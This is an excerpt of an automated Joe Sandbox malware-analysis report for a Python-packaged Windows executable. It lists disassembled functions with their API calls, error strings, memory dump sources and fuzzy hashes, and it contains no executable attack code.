                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9007a02874a4bdb622f11420666ed0fca7fc5bec9a1caf3f370f90a38daeabf3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51112161A0AA42E1FA568B14D84637833B0FF50BD4F505632C51E476F4DF3CE4A5C328
                                                                                                                                                                                                            Function 00007FF7ACE83B80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE83BB1
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                                            • API String ID: 2581892565-1977442011
                                                                                                                                                                                                            • Opcode ID: ecd9224541c82b8805659ffed1dacaf8541a9c5a4d14f69c88a104199cf53391
                                                                                                                                                                                                            • Instruction ID: 48750158458a96614d5e4ad0da3891a20209eeadcb22764970ab13a75f23468c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecd9224541c82b8805659ffed1dacaf8541a9c5a4d14f69c88a104199cf53391
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B701D870B1E3C2B4FA61B714D9063B5B281AF18786FC64031D80EA62B6EE5CE5548720
                                                                                                                                                                                                            Function 00007FF8A7FFE4D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PyEval_SaveThread.PYTHON38(?,?,?,?,?,?,?,?,?,00007FF8A7FF349A), ref: 00007FF8A7FFE4E5
                                                                                                                                                                                                            • PyEval_RestoreThread.PYTHON38(?,?,?,?,?,?,?,?,?,00007FF8A7FF349A), ref: 00007FF8A7FFE52A
                                                                                                                                                                                                            • PyErr_SetString.PYTHON38(?,?,?,?,?,?,?,?,?,00007FF8A7FF349A), ref: 00007FF8A7FFE54A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Eval_Thread$Err_RestoreSaveString
                                                                                                                                                                                                            • String ID: could not create decompression dict
                                                                                                                                                                                                            • API String ID: 695671107-787835636
                                                                                                                                                                                                            • Opcode ID: b0ff333fe35cb93d77ab09c63954792cbf1d25646341036cf9c7d81ec24ac140
                                                                                                                                                                                                            • Instruction ID: 0b67c679dfa44c20fc819fba4813d115b437e38deb9c6d18f49bf60979151a9a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0ff333fe35cb93d77ab09c63954792cbf1d25646341036cf9c7d81ec24ac140
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F013931A0AE42E2EA518F25F94436923B1FB54BD4F401231DA4D47694EF3CE0B68714
                                                                                                                                                                                                            Function 00007FF8A7FFB4E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Size$Arg_CallMethod_Object_ParseTuple_
                                                                                                                                                                                                            • String ID: OOO:__exit__$close
                                                                                                                                                                                                            • API String ID: 1059921960-2153562444
                                                                                                                                                                                                            • Opcode ID: 51772226df014e327d83b06f6c3363231292b2bf711aefd4f77b23cc58841b78
                                                                                                                                                                                                            • Instruction ID: e2f4058295eb1846346f973c40fbb48e60965b57b85ce140ff89be804cbe6e05
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51772226df014e327d83b06f6c3363231292b2bf711aefd4f77b23cc58841b78
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5F06DA1B1AB46A2EF458F65E8406A533A0FF54BC0F484232CD0E437A4DF3CE6A5C714
                                                                                                                                                                                                            Function 00007FF8A7FFE940 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • cannot call flush() before consuming output from previous operation, xrefs: 00007FF8A7FFE975
                                                                                                                                                                                                            • cannot call flush() after compression finished, xrefs: 00007FF8A7FFE952
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CallErr_ObjectObject_String
                                                                                                                                                                                                            • String ID: cannot call flush() after compression finished$cannot call flush() before consuming output from previous operation
                                                                                                                                                                                                            • API String ID: 59860960-801479208
                                                                                                                                                                                                            • Opcode ID: 212e47e430bc2d926ec041e93e1dceacba0356f9fe499d936cfa0916138b1330
                                                                                                                                                                                                            • Instruction ID: eb68e526cd8af65569c6a5f050fa7ac9c67820b7c1d1f4c43f56c97f3f9a6769
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 212e47e430bc2d926ec041e93e1dceacba0356f9fe499d936cfa0916138b1330
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFF0F961A0AA02A1FF648F64D84537833E0EF54B85F584135C51D0A2E4DFBCA6EAD724
                                                                                                                                                                                                            Function 00007FF8A7FFE9B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • cannot call finish() before consuming output from previous operation, xrefs: 00007FF8A7FFE9E5
                                                                                                                                                                                                            • cannot call finish() after compression finished, xrefs: 00007FF8A7FFE9C2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CallErr_ObjectObject_String
                                                                                                                                                                                                            • String ID: cannot call finish() after compression finished$cannot call finish() before consuming output from previous operation
                                                                                                                                                                                                            • API String ID: 59860960-3608301232
                                                                                                                                                                                                            • Opcode ID: a8b01dddda80718a8da7875e843859b80ffecd0882e156c7dca617638283ca2f
                                                                                                                                                                                                            • Instruction ID: 2eab238fd9dc66a8cea16e0b8f3ade9e9c7cfc778f181a2aefedde05cc296be4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8b01dddda80718a8da7875e843859b80ffecd0882e156c7dca617638283ca2f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FCF0F961E0AA02A1EF648F24D88537823A0FF54B95F594131C54D0A2E4DFBC95EAC724
                                                                                                                                                                                                            Function 00007FF8A7FFB560 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_String
                                                                                                                                                                                                            • String ID: cannot __enter__ multiple times$stream is closed
                                                                                                                                                                                                            • API String ID: 1450464846-1434507833
                                                                                                                                                                                                            • Opcode ID: 57029dde13698c2cb0512c99fd5503e7ce4736fddfe9f1c476bbf37bc2f7fe47
                                                                                                                                                                                                            • Instruction ID: d227337ed9e5b83c2e30fcf5358f84186e3d0b5186e82278f6a0d66be8d1b811
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 57029dde13698c2cb0512c99fd5503e7ce4736fddfe9f1c476bbf37bc2f7fe47
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DEF03A61E06A03A2EF148B29D88526427E0FB49B88F910531C50C462A0DF7DD59BC314
                                                                                                                                                                                                            Function 00007FF8A7FF65D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_String
                                                                                                                                                                                                            • String ID: cannot __enter__ multiple times$stream is closed
                                                                                                                                                                                                            • API String ID: 1450464846-1434507833
                                                                                                                                                                                                            • Opcode ID: 4da706eb07cdbdf220494daa10d3c2e1fb2ddb4183d1b445676319e0b30e3635
                                                                                                                                                                                                            • Instruction ID: ca39e049dbddb359937528b3e8efee1e185ac7d1b18e01ec6576997e1e8b32f8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4da706eb07cdbdf220494daa10d3c2e1fb2ddb4183d1b445676319e0b30e3635
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17F0FE62E06A02E1EF449B69DC9527423B0EB48B98F910535C50D462B0DF7DD5EBC714
                                                                                                                                                                                                            Function 00007FF8A8067F70 Relevance: 6.4, APIs: 5, Instructions: 117COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,00000001,00007FF8A8067D30), ref: 00007FF8A8068059
                                                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,00000001,00007FF8A8067D30), ref: 00007FF8A806808E
                                                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,00000001,00007FF8A8067D30), ref: 00007FF8A80680C0
                                                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,00000001,00007FF8A8067D30), ref: 00007FF8A80680E4
                                                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,00000001,00007FF8A8067D30), ref: 00007FF8A8068173
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memmove$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3790616698-0
                                                                                                                                                                                                            • Opcode ID: e7bcc64d4727b54653b92584d6891682840c2cee44334a35ac5f795502a8e6cc
                                                                                                                                                                                                            • Instruction ID: 0b604e8a50212f201b92f6b0b176689fd93135b748412c6548cc8d244e6eb314
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7bcc64d4727b54653b92584d6891682840c2cee44334a35ac5f795502a8e6cc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9515632A05A8197EB94CF28D8816E973A0F749BD8F184236DB1C8B785DF34E4A5CB14
                                                                                                                                                                                                            Function 00007FF8A801C240 Relevance: 6.3, APIs: 5, Instructions: 83COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A801AD03), ref: 00007FF8A801C2B5
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A801AD03), ref: 00007FF8A801C2D9
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A801AD03), ref: 00007FF8A801C2E1
                                                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A801AD03), ref: 00007FF8A801C329
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$Leave$Entermemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2581898777-0
                                                                                                                                                                                                            • Opcode ID: 804149251156a03c812c373434d70eb24604902e1426a292cd56c75ed5fe42c9
                                                                                                                                                                                                            • Instruction ID: a9212996878905732b484340141033dad5a2387475a49b7c835697714a532145
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 804149251156a03c812c373434d70eb24604902e1426a292cd56c75ed5fe42c9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3641AF22D19B85D7EB518F25E5016AA7370FBA9B84F05A320DF8E23652DF38F1E58700
                                                                                                                                                                                                            Function 00007FF8A801E5A0 Relevance: 6.3, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A801B138), ref: 00007FF8A801E5C1
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A801B138), ref: 00007FF8A801E626
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A801B138), ref: 00007FF8A801E673
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF8A801B138), ref: 00007FF8A801E69C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$Leave$Entermalloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3130977980-0
                                                                                                                                                                                                            • Opcode ID: 5caee3093d0b1264fa12ea367ef89bf96a2b9f9263f0fb8ee3ac0537f5913f99
                                                                                                                                                                                                            • Instruction ID: b2747d739a65db19135af5d79808c879e63b4be7769acfa9256c4d37df7d92cd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5caee3093d0b1264fa12ea367ef89bf96a2b9f9263f0fb8ee3ac0537f5913f99
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1317022E09B8592EE519F25A54013963A4FFA9BD4F049230DE8D17769DF3CE4D08750
                                                                                                                                                                                                            Function 00007FF7ACE9B9A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                            • Opcode ID: 3b6644ee017022d719a3afab9fc978a5fba374dbb9fb0623c46dfb0064678277
                                                                                                                                                                                                            • Instruction ID: 0bb24d3905424621f0574adb71e9df40b1d22d97829220cc0c9f3cc5a7f53e67
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b6644ee017022d719a3afab9fc978a5fba374dbb9fb0623c46dfb0064678277
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5D14932B0EA4199E720DF75D4402ECB7B1FB04798B8546B5EE5EA7BA9DE38D016C310
                                                                                                                                                                                                            Function 00007FF8A8174CF0 Relevance: 6.3, APIs: 4, Instructions: 260COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: exit
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2483651598-0
                                                                                                                                                                                                            • Opcode ID: c360a583a97ca38ea79cec5d75abd8159c3685e1a6cbe783be4771ced66dcaf5
                                                                                                                                                                                                            • Instruction ID: ce7220aacbaeca702001ea5f79a323ba71ad13c7528e4f2033b854164b8bbbd4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c360a583a97ca38ea79cec5d75abd8159c3685e1a6cbe783be4771ced66dcaf5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27C1683260ABC596EB62CF15E5407AAB7A5FB84BD4F144039DE8D43B58EF38D484CB24
                                                                                                                                                                                                            Function 00007FF8A8161550 Relevance: 6.3, APIs: 4, Instructions: 252COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: exit$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2031340617-0
                                                                                                                                                                                                            • Opcode ID: 74f536612ec3a1de1ddf9941b97d8d2648c32dadeff25fcc8e51b87fe650bca5
